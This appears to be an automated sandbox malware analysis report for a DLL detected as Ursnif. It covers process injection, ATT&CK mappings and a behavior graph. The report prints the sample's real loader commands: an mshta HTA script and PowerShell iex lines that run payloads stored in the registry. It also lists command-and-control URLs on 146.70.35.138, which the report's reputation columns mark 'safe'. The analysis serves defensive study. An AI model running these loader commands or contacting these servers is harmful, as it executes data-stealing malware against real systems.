                      Source: mshta.exe, 00000017.00000003.329575243.0000022F66BCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: mshta.exe, 00000017.00000003.329575243.0000022F66BCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000021.00000000.383500997.000000000510C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: explorer.exe, 00000021.00000000.385694451.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}on:Mondz?S
                      Source: explorer.exe, 00000021.00000000.385694451.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0cY
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0580A513 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0580BE55 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 146.70.35.138 80
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF61B5912E0
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF61B5912E0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 352000
                      Injects code into the Windows Explorer (explorer.exe)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 352000 value: 00
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 7FF802BC1580 value: EB
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 2BC1580
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2392.tmp" "c:\Users\user\AppData\Local\Temp\poet0yxq\CSCB57F583549494C91A9647985948976.TMP"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3B60.tmp" "c:\Users\user\AppData\Local\Temp\bscdh0f0\CSCCEA1AC591E3E41DFA7DCA22F6F20A95.TMP"
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: explorer.exe, 00000021.00000000.408252291.0000000005E60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000000.379131274.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.408234525.0000000005610000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000021.00000000.400441587.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000000.379131274.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.421471137.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000021.00000000.379131274.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.421471137.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.400760841.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager,
                      Source: explorer.exe, 00000021.00000000.379131274.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.421471137.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.400760841.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F12D3 cpuid
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05804DF5 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F5410 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F515F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F12D3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.260779553.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.308220825.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.260884971.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.309153947.0000000004D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.306041676.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261032532.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261191379.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.260987111.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261105592.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261071181.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261177888.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5292, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6612, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.48994a0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.49f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.48994a0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4e7a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f26940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4ef94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4e7a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.307999471.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.418290264.0000000004899000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.307957841.0000000004E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.420929959.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.260779553.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.308220825.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.260884971.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.309153947.0000000004D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.306041676.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261032532.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261191379.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.260987111.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261105592.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261071181.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261177888.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5292, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6612, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.48994a0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.49f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.48994a0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4e7a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f26940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4ef94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4e7a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.307999471.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.418290264.0000000004899000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.307957841.0000000004E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.420929959.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      1
                      Valid Accounts                      		1
                      Windows Management Instrumentation                      		1
                      Valid Accounts                      		1
                      Valid Accounts                      		1
                      Obfuscated Files or Information                      		OS Credential Dumping1
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		Exfiltration Over Other Network Medium2
                      Ingress Tool Transfer                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                      Data Encrypted for Impact
                      Default Accounts3
                      Native API                      		Boot or Logon Initialization Scripts1
                      Access Token Manipulation                      		1
                      File Deletion                      		LSASS Memory1
                      Account Discovery                      		Remote Desktop Protocol1
                      Email Collection                      		Exfiltration Over Bluetooth2
                      Encrypted Channel                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts1
                      Command and Scripting Interpreter                      		Logon Script (Windows)413
                      Process Injection                      		1
                      Masquerading                      		Security Account Manager3
                      File and Directory Discovery                      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Non-Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Valid Accounts                      		NTDS25
                      System Information Discovery                      		Distributed Component Object ModelInput CaptureScheduled Transfer11
                      Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Access Token Manipulation                      		LSA Secrets1
                      Query Registry                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common31
                      Virtualization/Sandbox Evasion                      		Cached Domain Credentials11
                      Security Software Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items413
                      Process Injection                      		DCSync31
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Rundll32                      		Proc Filesystem3
                      Process Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                      Application Window Discovery                      		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                      System Owner/User Discovery                      		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture11
                      Remote System Discovery                      		Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeylogging1
                      System Network Configuration Discovery                      		Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 614287 Sample: VoevdOQpeU.dll Startdate: 23/04/2022 Architecture: WINDOWS Score: 100 61 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->61 63 Found malware configuration 2->63 65 Multi AV Scanner detection for submitted file 2->65 67 8 other signatures 2->67 9 mshta.exe 19 2->9         started        11 loaddll32.exe 1 2->11         started        process3 process4 13 powershell.exe 33 9->13         started        16 cmd.exe 1 11->16         started        18 WerFault.exe 6 9 11->18         started        20 WerFault.exe 2 9 11->20         started        22 WerFault.exe 11->22         started        signatures5 81 Injects code into the Windows Explorer (explorer.exe) 13->81 83 Writes to foreign memory regions 13->83 85 Creates a thread in another existing process (thread injection) 13->85 24 explorer.exe 13->24 injected 27 csc.exe 3 13->27         started        30 csc.exe 3 13->30         started        32 conhost.exe 13->32         started        34 rundll32.exe 1 6 16->34         started        process6 dnsIp7 73 Self deletion via cmd delete 24->73 37 cmd.exe 24->37         started        53 C:\Users\user\AppData\Local\...\poet0yxq.dll, PE32 27->53 dropped 40 cvtres.exe 1 27->40         started        55 C:\Users\user\AppData\Local\...\bscdh0f0.dll, PE32 30->55 dropped 42 cvtres.exe 1 30->42         started        57 146.70.35.138, 49766, 80 TENET-1ZA United Kingdom 34->57 75 System process connects to network (likely due to code injection or exploit) 34->75 77 Writes to foreign memory regions 34->77 79 Writes registry values via WMI 34->79 44 control.exe 1 34->44         started        file8 signatures9 process10 signatures11 69 Uses ping.exe to sleep 37->69 71 Uses ping.exe to check the status of other devices and networks 37->71 46 PING.EXE 37->46         started        49 conhost.exe 37->49         started        51 rundll32.exe 44->51         started        process12 dnsIp13 59 192.168.2.1 unknown unknown 46->59

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      VoevdOQpeU.dll38%ReversingLabsWin32.Trojan.Lazy
                      VoevdOQpeU.dll100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      2.2.rundll32.exe.49f0000.0.unpack100%AviraHEUR/AGEN.1245293Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://146.70.35.138/phpadmin/Vo3V1ij8xfQAzbYEppxuGj/YfKBcB_2BiFsK/C5o_2FK1/LFX_2FAQmA1J0Gg2IGK0zii/Cqu4J51vDj/wlNBNCb18BPgk55aw/3DJofkjbHHw_/2F3O9t6XtUN/FhzyouLiXCH4qy/e6m_2F6Bp87emTDJkwB0B/GJSc0pfzfjLvMKIS/Fcz1B6FomHVea2H/3F6nRjbT0qghS0NNIb/kfO6CmRa0/E8U4GDXz2DXZU_2BDOzp/T84va5G8JnhB3/UMJfQ.src0%Avira URL Cloudsafe
                      http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
                      http://146.70.35.138/phpadmin/DRUYboFifxi6C3/_2BjVEcKiT1b8A_2BvMed/1ckh5D3V8MdKp2S2/SxMBQuJjSXDeW9Y/7fodbbXY21Jrsa2aXJ/S90Gqb_2B/KDYz_2F5NJsyx14KqPKz/ecUQVATr13lzZyN_2B_/2BoLTTXT06dmMNQURoEaga/M1AdtgAQJw1vj/q_2FSYWg/oo4zTjJDuzf2mz8BRfV3I9z/TX7m3RhRWd/LYr8gkK9WgmQ0jja9/kmBHLi0WTs_2/FFd4Km9NmRn/_2FUZ.src0%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txt0%URL Reputationsafe
                      http://146.70.35.138/phpadmin/GVoID0TbPRvLYlr7up2X9/gD2XQvRshzT0oIvQ/0mEtVI_2FJuzvKC/fbaZh1y3_2FnOqy8_2/B0Y8u0dqv/V11JJbfZHGLCQ043KVhZ/2j3FiaSLUSAIqnVTtEF/p_2F7mTRIgp_2F43j86HIJ/7JamWIlhMtaxW/Qv_2BsMI/GK_2BjMae66_2B0eWRxZare/pyglkGar6g/LD_2FkUNwRZVbFFyN/qmaS1_2FZd3W/iyocOp4EpCY/lkbOHJ4rs/yFlR4ppeN_2/FAS.src0%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txtC:0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://146.70.35.138/phpadmin/Vo3V1ij8xfQAzbYEppxuGj/YfKBcB_2BiFsK/C5o_2FK1/LFX_2FAQmA1J0Gg2IGK0zii/Cqu4J51vDj/wlNBNCb18BPgk55aw/3DJofkjbHHw_/2F3O9t6XtUN/FhzyouLiXCH4qy/e6m_2F6Bp87emTDJkwB0B/GJSc0pfzfjLvMKIS/Fcz1B6FomHVea2H/3F6nRjbT0qghS0NNIb/kfO6CmRa0/E8U4GDXz2DXZU_2BDOzp/T84va5G8JnhB3/UMJfQ.srctrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://146.70.35.138/phpadmin/DRUYboFifxi6C3/_2BjVEcKiT1b8A_2BvMed/1ckh5D3V8MdKp2S2/SxMBQuJjSXDeW9Y/7fodbbXY21Jrsa2aXJ/S90Gqb_2B/KDYz_2F5NJsyx14KqPKz/ecUQVATr13lzZyN_2B_/2BoLTTXT06dmMNQURoEaga/M1AdtgAQJw1vj/q_2FSYWg/oo4zTjJDuzf2mz8BRfV3I9z/TX7m3RhRWd/LYr8gkK9WgmQ0jja9/kmBHLi0WTs_2/FFd4Km9NmRn/_2FUZ.srctrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://146.70.35.138/phpadmin/GVoID0TbPRvLYlr7up2X9/gD2XQvRshzT0oIvQ/0mEtVI_2FJuzvKC/fbaZh1y3_2FnOqy8_2/B0Y8u0dqv/V11JJbfZHGLCQ043KVhZ/2j3FiaSLUSAIqnVTtEF/p_2F7mTRIgp_2F43j86HIJ/7JamWIlhMtaxW/Qv_2BsMI/GK_2BjMae66_2B0eWRxZare/pyglkGar6g/LD_2FkUNwRZVbFFyN/qmaS1_2FZd3W/iyocOp4EpCY/lkbOHJ4rs/yFlR4ppeN_2/FAS.srctrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://https://file://USER.ID%lu.exe/updrundll32.exe, 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
